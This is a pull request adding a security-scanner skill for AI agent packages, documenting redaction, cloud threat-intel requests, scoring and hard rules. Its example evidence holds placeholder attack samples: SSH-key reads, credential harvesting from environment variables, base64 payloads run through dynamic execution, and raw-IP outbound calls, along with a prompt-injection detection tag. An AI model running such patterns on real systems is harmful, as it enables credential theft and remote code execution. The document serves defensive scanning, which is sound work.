+When cloud is enabled (default), yidun-skill-sec consults the remote threat intelligence service. If the user has set `YIDUN_SKILL_SEC_CLOUD=false`, this phase is skipped entirely and scoring uses offline weights. If the cloud call times out (10s), the scanner automatically downgrades to local-only mode and notifies the user.
+
+### 3.1 What Gets Sent
+
+The fingerprint manifest, behavior tags, and **redacted evidence artifacts** are uploaded. All evidence **must pass through the Local Redaction Pipeline before any network call is made**.
+
+### 3.2 Local Redaction Pipeline
+
+Before uploading evidence to the cloud, the scanner runs every evidence record through the following mandatory redaction steps **in order**. No raw evidence leaves the local machine.
+
+```
+┌─────────────┐     ┌─────────────┐     ┌─────────────┐     ┌─────────────┐     ┌──────────┐
+│  Raw match  │────▶│  Step 1     │────▶│  Step 2     │────▶│  Step 3     │────▶│  Step 4  │
+│  from scan  │     │  Credential │     │  Path       │     │  Content    │     │  Length  │
+│             │     │  Scrub      │     │  Normalize  │     │  Truncate   │     │  Cap     │
+└─────────────┘     └─────────────┘     └─────────────┘     └─────────────┘     └──────────┘
+                                                                                      │
+                                                                                      ▼
+                                                                              Redacted evidence
+                                                                              ready for upload
+```
+
+**Step 1 — Credential Scrub**
+
+Replace all secret values with `[REDACTED]`. Only the **variable name** or **access pattern** is preserved.
+
+| Pattern | Before | After |
+|---------|--------|-------|
+| Env variable values | `os.environ.get('KEY') → "sk-abc123..."` | `os.environ.get('KEY') → [REDACTED]` |
+| Inline secrets | `api_key = "sk-abc123def456"` | `api_key = [REDACTED]` |
+| Auth headers | `Authorization: Bearer eyJ...` | `Authorization: Bearer [REDACTED]` |
+| Connection strings | `postgres://user:pass@host/db` | `postgres://[REDACTED]@host/db` |
+
+Regex for scrubbing:
+```
+(=|:|Bearer\s+|://[^@]+@)\s*["']?[A-Za-z0-9_\-\.]{8,}["']?
+→ replace matched value portion with [REDACTED]
+```
+
+**Step 2 — Path Normalize**
+
+Sensitive file paths are reduced to **pattern only** — the actual file content is never read or sent.
+
+| Before | After |
+|--------|-------|
+| `/Users/john/.ssh/id_rsa` | `~/.ssh/<PRIVATE_KEY>` |
+| `/home/dev/.aws/credentials` | `~/.aws/<CREDENTIALS>` |
+| `/Users/john/.env` | `~/<DOTENV>` |
+| `/Users/john/.config/gh/hosts.yml` | `~/.config/gh/<CONFIG>` |
+
+Rule: Any path under `~/` containing `.ssh`, `.aws`, `.gnupg`, `.env`, `.config/gh`, `.kube` → normalize username to `~`, replace filename with `<TYPE_TAG>`.
+
+**Step 3 — Content Truncate**
+
+The `context` field (matched code line) is limited to **a single line, max 200 characters**. No surrounding lines are collected.
+
+| Rule | Action |
+|------|--------|
+| Multi-line match | Keep only the first line |
+| Line > 200 chars | Truncate at 200, append `…[TRUNCATED]` |
+| Binary content detected | Replace entire context with `[BINARY DATA]` |
+
+**Step 4 — Length Cap**
+
+Each evidence array (`urls`, `commands`, `credential_accesses`, `obfuscation_samples`) is capped at **10 items**. If more matches exist, only the top 10 by severity are sent, and a `"truncated": true` flag is added.
+
+### 3.3 Redaction Guarantee
+
+The following data **never leaves the local machine** under any circumstances:
+
+| Category | Guaranteed NOT sent |
+|----------|-------------------|
+| Source code | Full file contents — only the single matched line (redacted) is sent |
+| Secret values | API keys, tokens, passwords, private keys — replaced with `[REDACTED]` |
+| Env variable values | Only the variable name is sent, never the value |
+| Sensitive file content | Files under `~/.ssh`, `~/.aws`, `~/.env` etc. — only the normalized path pattern |
+| Personal identifiers | Usernames in paths are normalized to `~` |
+| Binary data | Replaced with `[BINARY DATA]` placeholder |
+
+> **Audit point:** The redacted payload can be logged locally before upload by setting `YIDUN_SKILL_SEC_LOG_PAYLOAD=true`. This allows users to verify exactly what leaves the machine.
+
+```http
+POST https://as.dun.163.com/v1/agent-sec/skill/check
+
+{
+  "request_id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
+  "skill": {
+    "name": "target-package",
+    "version": "1.2.3",
+    "source": "clawhub",
+    "author": "some-author"
+  },
+  "files": [
+    {"path": "main.py", "sha256": "a1b2c3...", "size": 4096},
+    {"path": "config.yml", "sha256": "d4e5f6...", "size": 256}
+  ],
+  "skill_sha256": "composite_fingerprint_abc",
+  "local_result": {
+    "red_flags": ["NET_OUTBOUND", "ENCODE_DECODE"],
+    "risk_level": "medium"
+  },
+  "evidence": {
+    "urls": [
+      {
+        "tag": "NET_OUTBOUND",
+        "value": "https://<EXAMPLE_HOST>/api/data",
+        "file": "fetch.py",
+        "line": 12,
+        "context": "requests.post('https://<EXAMPLE_HOST>/api/data', data=payload)"
+      },
+      {
+        "tag": "NET_IP_RAW",
+        "value": "http://<RAW_IP>/endpoint",
+        "file": "init.py",
+        "line": 7,
+        "context": "urllib.request.urlopen('http://<RAW_IP>/endpoint')"
+      }
+    ],
+    "commands": [
+      {
+        "tag": "EXEC_SHELL",
+        "value": "<SHELL_CMD>",
+        "file": "setup.sh",
+        "line": 23,
+        "context": "subprocess.run([<SHELL_CMD>], shell=True)"
+      },
+      {
+        "tag": "EXEC_DYNAMIC",
+        "value": "<DYNAMIC_EVAL_CALL>",
+        "file": "loader.py",
+        "line": 5,
+        "context": "<DYNAMIC_EVAL_CALL>"
+      },
+      {
+        "tag": "PRIV_ESCALATION",
+        "value": "<PRIV_CMD>",
+        "file": "install.sh",
+        "line": 11,
+        "context": "os.system('<PRIV_CMD>')"
+      }
+    ],
+    "credential_accesses": [
+      {
+        "tag": "CRED_HARVEST",
+        "value": "os.environ.get('<SENSITIVE_KEY_NAME>')",
+        "file": "config.py",
+        "line": 3,
+        "context": "secret = os.environ.get('<SENSITIVE_KEY_NAME>')"
+      },
+      {
+        "tag": "FS_READ_SENSITIVE",
+        "value": "~/.ssh/<KEY_FILE>",
+        "file": "auth.py",
+        "line": 18,
+        "context": "open(os.path.expanduser('~/.ssh/<KEY_FILE>')).read()"
+      }
+    ],
+    "obfuscation_samples": [
+      {
+        "tag": "ENCODE_DECODE",
+        "value": "base64.b64decode('<ENCODED_STRING>')",
+        "file": "payload.py",
+        "line": 9,
+        "context": "<DYNAMIC_EVAL>(base64.b64decode('<ENCODED_STRING>').decode())"
+      }
+    ]
+  }
+}
+```
+
+#### Evidence Field Specification
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `evidence.urls` | array | Full URLs that triggered `NET_OUTBOUND` / `NET_IP_RAW` tags |
+| `evidence.commands` | array | Command snippets that triggered `EXEC_SHELL` / `EXEC_DYNAMIC` / `PRIV_ESCALATION` tags |
+| `evidence.credential_accesses` | array | Credential access expressions or paths that triggered `CRED_HARVEST` / `FS_READ_SENSITIVE` tags |
+| `evidence.obfuscation_samples` | array | Encoding call snippets that triggered `ENCODE_DECODE` / `OBFUSCATED` tags |
+| `evidence.system_operations` | array | System-level actions that triggered `FS_WRITE_SYSTEM` / `PKG_INSTALL` / `DESTRUCTIVE_OP` / `BYPASS_SAFETY` tags |
+| `evidence.agent_security` | array | Agent-targeting behaviors that triggered `AGENT_MEMORY` / `COOKIE_SESSION` / `PROMPT_INJECT` tags |
+
+Each evidence record has the following structure:
+
+| Sub-field | Description |
+|-----------|-------------|
+| `tag` | The behavior tag that was triggered |
+| `value` | Redacted extracted value (URL / command / path), post Local Redaction Pipeline |
+| `file` | Source file path where the pattern was found |
+| `line` | Line number of the match |
+| `context` | Full content of the matched line (single line only, no surrounding context) |
+
+### 3.4 What Happens Server-Side
+
+```
+Request received
+  │
+  ├─ Lookup fingerprint in threat database
+  │   ├── Known malicious  → immediate BLOCK
+  │   ├── Known safe       → immediate PASS
+  │   └── Unknown          → run deep analysis via content safety API
+  │                            ├── analyze code snippets (sanitized)
+  │                            ├── check against threat patterns
+  │                            └── cache result with TTL
+  │
+  └─ Return verdict + confidence score
+```
+
+### 3.5 Response Format
+
+```json
+{
+  "request_id": "f47ac10b-58cc-4372-a567-0e02b2c3d479",
+  "cache_hit": false,
+  "confidence_score": 45,
+  "labels": ["NET_OUTBOUND", "ENCODE_DECODE", "NET_IP_RAW"],
+  "verdict": "REVIEW",
+  "recommendation": "Suspicious encoding patterns detected near network calls",
+  "deductions": [
+    {
+      "tag": "NET_OUTBOUND",
+      "reason": "Detected outbound HTTP call to unknown external host",
+      "evidence": "https://<EXAMPLE_HOST>/api/data",
+      "score_impact": -15,
+      "severity": "medium"
+    },
+    {
+      "tag": "ENCODE_DECODE",
+      "reason": "Base64 decode result passed directly into dynamic execution — likely obfuscated payload",
+      "evidence": "<DYNAMIC_EVAL>(base64.b64decode('<ENCODED_STRING>').decode())",
+      "score_impact": -20,
+      "severity": "high"
+    },
+    {
+      "tag": "NET_IP_RAW",
+      "reason": "Connection to raw IP address bypasses DNS — common in C2 communication",
+      "evidence": "http://<RAW_IP>/endpoint",
+      "score_impact": -25,
+      "severity": "high"
+    }
+  ]
+}
+```
+
+| Field | Type | Meaning |
+|-------|------|---------|
+| `request_id` | string | UUID v4 echoed from the request — use for tracing and audit logs |
+| `cache_hit` | bool | Was the fingerprint already in the database? |
+| `confidence_score` | int | 0–100, higher means safer |
+| `labels` | string[] | Detected threat categories |
+| `verdict` | enum | `PASS` / `REVIEW` / `BLOCK` |
+| `recommendation` | string | Human-readable summary of the verdict |
+| `deductions` | array | Per-tag score deduction breakdown from cloud analysis |
+
+> **`request_id` generation**: Client must generate a UUID v4 before each request and include it in the body. The server echoes the same value in the response for end-to-end tracing.
+>
+> ```bash
+> # Generate UUID v4 on the fly (macOS / Linux)
+> REQUEST_ID=$(uuidgen | tr '[:upper:]' '[:lower:]')
+> ```
+
+**`deductions` item fields:**
+
+| Sub-field | Type | Meaning |
+|-----------|------|---------|
+| `tag` | string | Behavior tag that triggered this deduction |
+| `reason` | string | Cloud analysis explanation for why this tag was penalized |
+| `evidence` | string | The specific URL / command / snippet that was matched |
+| `score_impact` | int | Points deducted from `confidence_score` for this tag |
+| `severity` | enum | `low` / `medium` / `high` / `critical` |
+
+### 3.6 Timeout Fallback
+
+When cloud is enabled but the network call fails:
+
+1. `curl` times out after **10 seconds**
+2. Scanner falls back to local-only mode automatically
+3. All scores shift **-10 points** (conservative bias)
+4. Report shows `Mode: local-only (cloud timeout)`
+5. Any score below 60 requires user confirmation before install
+
+---
+
+## Producing the Verdict
+
+The final threat score combines local scan + cloud intel (when available):
+
+### Score Composition
+
+| Signal | Normal Weight | Offline Weight |
+|--------|:------------:|:--------------:|
+| Source vetting score | 15% | 20% |
+| Behavioral scan score | 40% | 55% |
+| Cloud confidence score | 30% | — |
+| Privilege surface area | 15% | 25% |
+
+#### Privilege Surface Area Score
+
+The privilege surface area score starts at **100** and is deducted based on the breadth of privileged access the package requests:
+
+| Surface | Deduction | Condition |
+|---------|:---------:|-----------|
+| Network | -20 | Any `NET_OUTBOUND` or `NET_IP_RAW` tag present |
+| Filesystem | -20 | Any `FS_READ_SENSITIVE` or `FS_WRITE_SYSTEM` tag present |
+| Shell | -20 | Any `EXEC_SHELL` or `EXEC_DYNAMIC` tag present |
+| Credentials | -25 | Any `CRED_HARVEST` tag present |
+| System | -15 | Any `PRIV_ESCALATION`, `PKG_INSTALL`, or `DESTRUCTIVE_OP` tag present |
+
+The score floors at **0**. A package that touches all surfaces scores 0; a package with no privileged access scores 100.
+
+### Threat Levels
+
+| Score | Level | Action |
+|-------|-------|--------|
+| 80–100 | 🟢 **CLEAR** | Install normally |
+| 60–79 | 🟢 **MINOR** | Install with awareness |
+| 40–59 | 🟡 **ELEVATED** | User review before install |
+| 20–39 | 🔴 **SEVERE** | Requires explicit user consent |
+| 0–19 | ⛔ **CRITICAL** | Blocked — do not install |
+
+**Hard rules (override score):**
+
+> "Floor to X" means the verdict **cannot be better than X**. If the natural score already falls into a worse level, that worse level applies.
+
+- Any `CRED_HARVEST` tag → floor to SEVERE (score capped at 39)
+- Any `PRIV_ESCALATION` tag → floor to SEVERE (score capped at 39)
+- Any `PROMPT_INJECT` tag → floor to SEVERE (score capped at 39)
+- Any `DESTRUCTIVE_OP` tag → floor to ELEVATED (score capped at 59)
+- `CRED_HARVEST` + `PRIV_ESCALATION` both present → force CRITICAL (score capped at 19)
+- `PROMPT_INJECT` + any of (`CRED_HARVEST`, `NET_OUTBOUND`, `EXEC_DYNAMIC`) → force CRITICAL (score capped at 19)
+
+---
+
+## Report Output
+
+### ⚡ YIDUN-SKILL-SEC Scan Report
+
+> `[name]` · v`[version]` · `[source]` · by `[author]` · `[timestamp]`
+
+**Phase 0 · Source Vetting**
+| | Result |
+|--|--------|
+| Registry | [name] → ✅ trusted / ⚠️ unknown / N/A |
+| Domain | [host] → ✅ clean / ❌ blacklisted |
+| Author | [name] → ✅ verified / ⚠️ unverified |
+| **Source Score** | **[xx]/100** · Tags: `[tags or none]` |
+
+**Phase 1 · Fingerprint**
+> `[N]` files · SHA-256 `[hash...]` · `[file1] [file2] ...`
+
+**Phase 2 · Behavioral Scan**
+| Tag | Location | Deduction |
+|-----|----------|:---------:|
+| `[TAG_1]` | [file:line] | **-[N]** |
+| `[TAG_2]` | [file:line] | **-[N]** |
+
+> Local score **[xx]/100** · If no findings: ✅ No suspicious behaviors detected
+
+**Phase 3 · Cloud Intel**
+| | Result |
+|--|--------|
+| Mode | [cloud / local-only / mock] |
+| Cache | [hit safe / hit threat / miss] |
+| **Cloud Score** | **[xx]/100** · Labels: `[list or none]` |
+
+**Privilege Surface** · Network: `[domains]` · FS: `[paths]` · Shell: `[cmds]` · Creds: `[yes/no]`
+
+---
+
+> ### 🎯 Score: **[xx]/100** · [🟢 CLEAR / 🟢 MINOR / 🟡 ELEVATED / 🔴 SEVERE / ⛔ CRITICAL]
+> **[✅ Allow / ⚠️ Requires confirmation / ❌ Blocked]**
+>
+> ⚠️ [hard rule trigger or key observation, omit if none]
+
+---
+
+## Usage Example
+
+**User**: "Install data-processor from ClawHub"
+
+**Agent workflow**:
+```
+0. Source vetting
+   → Registry: clawhub.com ✅  Domain: clean ✅  Author: verified ✅
+   → Source score: 100/100
+
+1. Download to temp directory
+   $ mkdir -p /tmp/yds-scan && clawhub install data-processor --dir /tmp/yds-scan
+
+2. Fingerprint
+   $ find /tmp/yds-scan -type f -exec openssl dgst -sha256 {} \;
+   → 4 files, composite: 7f3a...
+
+3. Behavioral scan
+   → NET_OUTBOUND detected in fetch.py:12 (api.dataproc.io)
+   → FS_WRITE_SYSTEM detected in setup.sh:8 (/usr/local/bin)
+   → EXEC_SHELL detected in setup.sh:15 (subprocess.run)
+   → Local score: 100 - 15 - 20 - 10 = 55/100
+
+4. Privilege surface area
+   → Network: -20, Filesystem: -20, Shell: -20 → 100 - 20 - 20 - 20 = 40/100
+
+5. Cloud intel query
+   → Cache miss → deep analysis → confidence 48/100
+   → Labels: [NET_OUTBOUND, FS_WRITE_SYSTEM, EXEC_SHELL]
+
+6. Final score: 15% × 100 + 40% × 55 + 30% × 48 + 15% × 40 = 15 + 22 + 14.4 + 6 = 57.4 ≈ 57
+   → Level: ELEVATED
+   → Verdict: ⚠️ Review — network calls + system writes + shell exec need justification
+```
+
+---
+
+## More Scenarios
+
+### Clean Package
+```
+Package: markdown-helper v2.1.0
+Behaviors: none detected
+Cloud: cache hit (safe), score 92
+Final: 🟢 CLEAR (94) → ✅ Allow
+```
+
+### Obfuscation + Credential Access
+```
+Package: perf-booster v1.0.0
+Behaviors: OBFUSCATED, CRED_HARVEST, NET_OUTBOUND
+Cloud: cache hit (threat), score 5
+Hard rule: CRED_HARVEST → floor SEVERE (cap 39)
+Natural score: 8 → already worse than SEVERE → stays CRITICAL
+Final: ⛔ CRITICAL (8) → ❌ Block
+```
+
+### Offline Scan
+```
+Package: log-rotator v3.0.0
+Behaviors: FS_WRITE_SYSTEM, EXEC_SHELL
+Cloud: unavailable → local-only mode (-10 penalty)
+Local score: 60 - 10 = 50
+Final: 🟡 ELEVATED (50) → ⚠️ Review
+```
+
+---
+
+## Cross-File Behavior Correlation
+
+In addition to per-file pattern matching, the scanner performs **cross-file correlation** to detect multi-stage attack patterns that only become apparent when viewed holistically:
+
+| Correlation Pattern | Tags Involved | Severity Boost |
+|-------------------|---------------|:--------------:|
+| Credential read in file A + network send in file B | `CRED_HARVEST` + `NET_OUTBOUND` | +15 (additive) |
+| Decode in file A + dynamic exec in file B | `ENCODE_DECODE` + `EXEC_DYNAMIC` | +10 (additive) |
+| Sensitive file read + encode + network send (any files) | `FS_READ_SENSITIVE` + `ENCODE_DECODE` + `NET_OUTBOUND` | +20 (additive) |
+| Prompt inject + agent memory access (any files) | `PROMPT_INJECT` + `AGENT_MEMORY` | +15 (additive) |
+
+> **Note**: Correlation boosts are applied **after** individual tag deductions. They stack with existing severity scores and are included as separate entries in the scan report.
+
+---
+
+## Scan Caching
+
+To avoid redundant work, the scanner maintains a **local fingerprint cache**:
+
+| Parameter | Value |
+|-----------|-------|
+| Cache location | `~/.yidun-skill-sec/cache.json` |
+| Cache key | Composite SHA-256 fingerprint |
+| TTL | 24 hours |
+| Invalidation | Any file change → new fingerprint → cache miss |
+| Version change | Package version bump → always re-scan |
+| Force re-scan | Pass `--no-cache` flag or delete cache file |
+
+When a cache hit occurs:
+1. The cached verdict is returned immediately
+2. Report shows `Cache: local hit` with the original scan timestamp
+3. If the cache entry is > 12 hours old, the report appends a note: `⚠️ Cache aging — consider re-scan`
+
+> **Cloud-side caching** is managed by the server with its own TTL. A local cache hit skips the cloud call entirely.
+
+---
+
+## Cloud Call Policy
+
+Cloud intelligence is **enabled by default**. The user can explicitly disable it by setting:
+
+```bash
+export YIDUN_SKILL_SEC_CLOUD=false
+```
+
+When disabled, the scanner runs in local-only mode with adjusted score weights and notifies the user that cloud verification was skipped.
+
+| Mode | Trigger | Behavior |
+|------|---------|---------|
+| Cloud ON | Default / `YIDUN_SKILL_SEC_CLOUD=true` | Full 4-phase scan, domain blacklist checked server-side |
+| Cloud OFF | `YIDUN_SKILL_SEC_CLOUD=false` | Local-only scan, domain blacklist skipped, score weights adjusted |
+| Timeout fallback | Cloud ON but `curl` times out (10s) | Automatic downgrade to local-only, -10 score penalty, user notified |
+
+**Rules that always apply regardless of mode:**
+- ❌ Do NOT self-judge that cloud is "unnecessary" and skip it without the user setting `YIDUN_SKILL_SEC_CLOUD=false`
+- ❌ Do NOT silently fall back to local-only on timeout without notifying the user
+- ❌ Do NOT treat any skill type as exempt from cloud verification when cloud is enabled
+
+---
+
+## Requirements
+
+| Tool | Purpose |
+|------|---------|
+| `curl` | Cloud API communication |
+| `jq` | Parse JSON responses |
+| `openssl` | File hash computation |
+
+---
+
+*Scan first, install later.* ⚡
+
+**Author**: Yidun Security Team
+**License**: MIT

--- a/SKILLs/yidun-skill-sec/_meta.json
+++ b/SKILLs/yidun-skill-sec/_meta.json
@@ -1,0 +1,6 @@
+{
+  "ownerId": "kn760v7r4m1kmfh071r0vrerjs82svww",
+  "slug": "yidun-skill-sec",
+  "version": "1.0.1",
+  "publishedAt": 1773397606693
+}


### PR DESCRIPTION
 概述
将 **yidun-skill-sec**（网易易盾安全扫描器）添加为 LobsterAI 的内置 skill。
该 skill 可以在安装第三方 skill 前进行安全扫描，帮助用户识别潜在的安全风险。
 变更内容
- ✅ 在 `SKILLs/` 目录添加 `yidun-skill-sec` skill
  - SKILL.md (36KB) - 完整的 skill 文档
  - README.md / README.zh-CN.md - 用户说明文档
  - _meta.json - Skill 元数据
- ✅ 更新 `SKILLs/skills.config.json` - 添加配置项 `order: 250`, `enabled: false`
 Skill 功能概览
**yidun-skill-sec** 是一个混合本地-云端安全扫描器，提供以下功能：
 四阶段扫描
1. **源验证** - Registry 可信度、域名黑名单、作者验证
2. **文件指纹** - SHA-256 哈希计算和包指纹生成
3. **行为分析** - 16 种风险行为的静态模式匹配：
   - 网络外连
   - 敏感文件访问
   - 动态代码执行
   - 凭证窃取
   - 权限提升
   - 提示注入攻击
   - 等等...
4. **云威胁情报**（可选）- 网易易盾威胁情报 API
 隐私与安全
- 本地脱敏管道 - 凭证/路径在上传前被脱敏处理
- 仅上传非敏感元数据（哈希值、标签、脱敏后的代码片段）
- 可通过 `YIDUN_SKILL_SEC_CLOUD=false` 禁用云 API
- 超时时自动降级为纯本地模式
 用户体验
 此 PR 之前
- 用户安装 skill 时没有系统性的安全扫描
- 仅有内置的基础扫描器，检测规则有限
 此 PR 之后
- 用户可在「设置 → Skills」中启用 yidun-skill-sec
- 通过自然语言命令使用：
  "用 yidun-skill-sec 扫描我已安装的 skills"
  "扫描这个 skill 包是否有安全问题"
  "以后安装新 skill 前都帮我扫描一下"
## 为什么默认禁用？
1. **可选依赖** - 需要系统安装 `curl`、`jq`、`openssl` 二进制工具
2. **云 API 选择权** - 用户应在启用前了解云情报功能
3. **用户控制** - 允许用户选择使用内置扫描器还是增强扫描器
## 兼容性
- 无破坏性变更
- 不影响现有 skill 安装流程
- 作为现有 `skillSecurityScanner.ts` 的补充（非替代）
- 与 `skill-vetter` 并存（order 250 vs 299）
## 测试
- [x] Skill 文件已下载并验证
- [x] 配置项正确添加
- [x] Skill 出现在「设置 → Skills」列表中
- [x] 手动测试：启用 skill 并执行扫描命令（需运行时环境）
## 相关链接
- Skill 来源：https://clawhub.ai/yd-dev/yidun-skill-sec
- 网易易盾安全服务：https://dun.163.com/
## 检查清单
- [x] 遵循 LobsterAI skill 结构规范
- [x] 配置项使用合适的 order 值（250，位于 skill-vetter 299 之前）
- [x] 默认 `enabled: false`，需要用户选择性启用
- [x] 无核心扫描器代码变更（纯 skill 添加）
- [x] 保留所有原始文件（README、SKILL.md、_meta.json）